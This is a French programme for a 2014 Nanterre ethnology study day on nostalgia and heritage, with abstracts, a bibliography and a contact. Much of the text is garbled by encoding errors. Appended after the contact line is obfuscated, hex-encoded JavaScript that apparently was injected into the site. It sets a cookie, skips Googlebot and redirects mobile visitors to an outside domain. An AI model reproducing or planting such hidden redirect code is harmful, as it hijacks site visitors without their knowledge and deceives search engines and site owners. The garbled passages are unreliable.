JOURNA�E D’A�TUDE FABRIQ’AM : patrimoine et nostalgie, le 26 mars 2014, LESC-MAE, Nanterre

PATRIMONIALISATION ET RA�GIMES D’HISTORICITA� (I)

NOSTALGIE ET PATRIMOINE

 

14h-18h – Laboratoire da��Ethnologie et de Sociologie ComparativeA�- Salle 308

Maison Ethnologie et ArchA�ologie RenA�-GinouvA?s

21 allA�e de l’UniversitA�

UniversitA� Paris OuestA�Nanterre

PrA�sentation.A�La nostalgieA�: entre expression A�motionnelle, discours et pratique de circonstances

Laurence Charlier (CERMA-Mondes AmA�ricains)

Dans la rA�gion du Nord Potosi bolivien, le discours nostalgique a pour effet de A�A�fatiguer le tempsA�A�. Loin da��A?tre un constat affligeant, cet effet inaugure un changementA�: la fin da��un cycle;A�pour les locuteurs, ce temps lA� est fatiguA� et va donc inA�vitablement cA�der la place A� un autre.A�Ce discours nostalgique performatif contribue ainsi A� la��avA?nement duA�A�A�renversementA�A�A�(pachakuti). NA�anmoins, il ne sa��agit pas seulement d’instrumentaliser un discours nostalgique mais da��en exploiter sciemment ses effetsA�: il y a une narration nostalgique actualisA�e en raison da��une expA�rience vA�cue et qui sa��exprime A�motionnellement (tristesse et colA?re). Cette narration comporte des outils rhA�toriques dont les acteurs sociaux se servent A� leurs propres finsA�: faire advenir la rA�volution. Cet exemple montre comment sa��articulent A�expressions A�motionnelles, discours et pratiques nostalgiques, les interventions qui suivent prA�sentant des modalitA�s variables de ces articulations. Enfin, le fait de confronter la nostalgie au patrimoine rend saillant diffA�rents aspects de ces processus qui demeurent confus lorsqu’on les A�tudie isolA�ment. Cette confrontation conduit A�galement A� de nouvelles problA�matiques.

Nostalgie cherche preneur(s). Les peintures d’Amatiwana TrumaiA�

Emmanuel de Vienne (EREA-LESC) et Sophie Moiroux (EREA)

Les Trumai (Amazonie brA�silienne) sont des familiers de la nostalgie. Elle est mA?me la tonalitA� principale de l’appartenance A� ce groupe A�A�pauvreA�A� de la sociA�tA� pluriethnique et Haut Xingu. Les Trumai A�chouent en effet depuis plusieurs dA�cennies A� exhiber les mA?mes signes spectaculaires d’indianitA� que leurs voisins et parents de la rA�gion. Dans ce contexte, Amatiwana occupe une place singuliA?re : il a dA� renoncer A� la chefferie A� cause de maladies rA�pA�tA�es et graves depuis la fin de son adolescence. Cette vie de souffrances et d’exils chroniques le rend emblA�matique de son propre groupe. Dans cette prA�sentation, on s’efforcera d’A�clairer par ce contexte les peintures A� l’huile sur toile qu’Amatiwana exA�cute depuis les annA�es 60. Figurant pour la plupart la vie qu’il estime avoir perdue (la mythologie, les rituels, la faune et la flore du Xingu), ces toiles A�produisent autant la nostalgie qu’elle ne l’expriment. Nous chercherons A� comprendre comment, en dA�passant la seule analyse des oeuvres pour examiner leurs parcours et leurs destinataires idA�aux ou rA�els.

Nostalgies en miroir. Chamanismes inter-A�thniques et reprA�sentations patrimonialesA� enA� Colombie

Anne Marie LosonczyA�(EPHE, CERMA-Mondes AmA�ricains)

La��urbanisation et la��A�litisation de pratiques rituelles amA�rindiennes emblA�matisA�es comme a�?chamaniquesa�� et impliquant la prise rituelle de la��ayahuasca (a�?yajA�a�� en Colombie) crA�ent des scA?nes ritualisA�es dans de nouveaux espaces, privA�s ou institutionnels (universitA�s, centres mA�dicaux, etc) oA? se dA�ploie une alternance entre conflit, A�change et malentendu performatif autour de diverses reprA�sentations patrimoniales du rituel et du breuvage hallucinogA?ne. Cette alternance est soutenue par des dispositifs nostalgiquesA�: celuiA� da��une A�A�nostalgie globaleA�A� ou da��une A�A�nostalgie da��ancA?tresA�A� des usagers de la��A�lite urbaine internationale ou locale et celui, rA�cemment appropriA� da��une nostalgie structurelle qua��expriment et mobilisent chamans et leaders indiens. La��apprentissage de cette derniA?re fait partie des nouvelles formes de transmission ethnique de la A� cultureA�A�. Les figures de la perte et de la renaissance, qui sont communes A� ces dispositifs articulent cependant des rapports au passA� A� des A�chelles diffA�rentes.

Attachements nostalgiques et patrimonialisation du troc dans les Andes argentines

Olivia AngA� (MusA�e du Quai de Branly)

Les foires de troc andines furent importA�es par les Espagnols pour approvisionner les centres urbains et miniers sur lesquels sa��articulait la sociA�tA� coloniale. La��organisation A�conomique prA�colombienne se caractA�risait quant A� elle par la��absence gA�nA�rale de marchA�. La circulation des denrA�es sa��inscrivait plutA?t dans le cadre des relations de parentA� qui unissaient les habitants des diffA�rentes zones A�cologiques de la cordillA?re. Le systA?me de troc contemporain est publiquement reconnu comme un vestige de ces rA�ciprocitA�s interA�cologiques, de mA?me que les foires lors desquelles ces transactions se trouvent condensA�es. A la��heure actuelle, ces scA?nes da��A�change sont envisagA�es comme des pratiques culturelles emblA�matiques de la��identitA� indigA?ne, en dA�pit de leur origine europA�enne.A�Dans la cordillA?re argentine, des institutions A�tatiques et non gouvernementales prA?chent pour la sauvegarde de ces rencontres dites A�A�ancestralesA� qua��elles estiment menacA�es par la��intA�gration croissante des paysans A� la��A�conomie capitaliste. Dans le but explicite da��inciter les paysans A� A�A�prA�serverA�cette traditionA�A�, de nombreuses institutions consacrent des fonds A� la perpA�tuation da��anciennesA� rencontres et A� la��implA�mentation de nouvelles. NA�anmoins, la��ethnographie des foires rA�vA?le la��existence de conceptions divergentes concernant les pratiques que ces interventions visent A� conserver.A�En comparant les reprA�sentations que les paysans se font du troc, avec celles des instancesA� patrimoniales, cette prA�sentation montre que la coopA�ration entre ces diffA�rents acteurs repose sur une nostalgie structurelle partagA�e pour un systA?me da��A�change ancestral dans lequel la rA�ciprocitA� parfaitement A�quilibrA�e na��aurait pas A�tA� mise A� mal par la dA�cadence moderne. Ce faisant, cet examen des diffA�rentes apprA�ciations du troc dans les Andes argentines montrera que la nostalgie continue de constituer un moteur important des interventions patrimoniales, en dA�pit des dA�finitions post-modernes des concepts de culture et de patrimoine dA�sormais en vigueur sur la scA?ne internationale.A�English version

Bibliographie indicative

– Herzfeld, Michael. 2007. A� Nostalgie structurelle. Le temps et le serment dans les villages de montagnes de CrA?te A�. Dans :A�La��intimitA� culturelle. PoA�tique sociale de la��Etat-Nation, pp. 173-213. QuA�becA�: Les presses de la��UniversitA�A�Laval.

– Berliner, David. 2010.A�A�A�Perdre l’esprit du lieu. Les politiques de l’Unesco A� Luang Prabang (RDP Lao)A�A�, Terrain, 55, pp. 90-105

Pour en savoir plus :

– Bissell, William Cunningham. 2005. A� Engaging Colonial Nostalgia A�.A�CulturalA�AnthropologyA�20(2), pp. 215-248.

– Dames, Nicholas. 2010. A� Nostalgia and Its Disciplines A�.A�Memory StudiesA�3(3), pp. 269-275.

– Rosaldo, Renato. 1989. A� Imperialist Nostalgia A�.A�RepresentationsA�26, pp. 107-122.

Organisation

Laurence Charlier: laurence.charlierzein@gmail.com

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}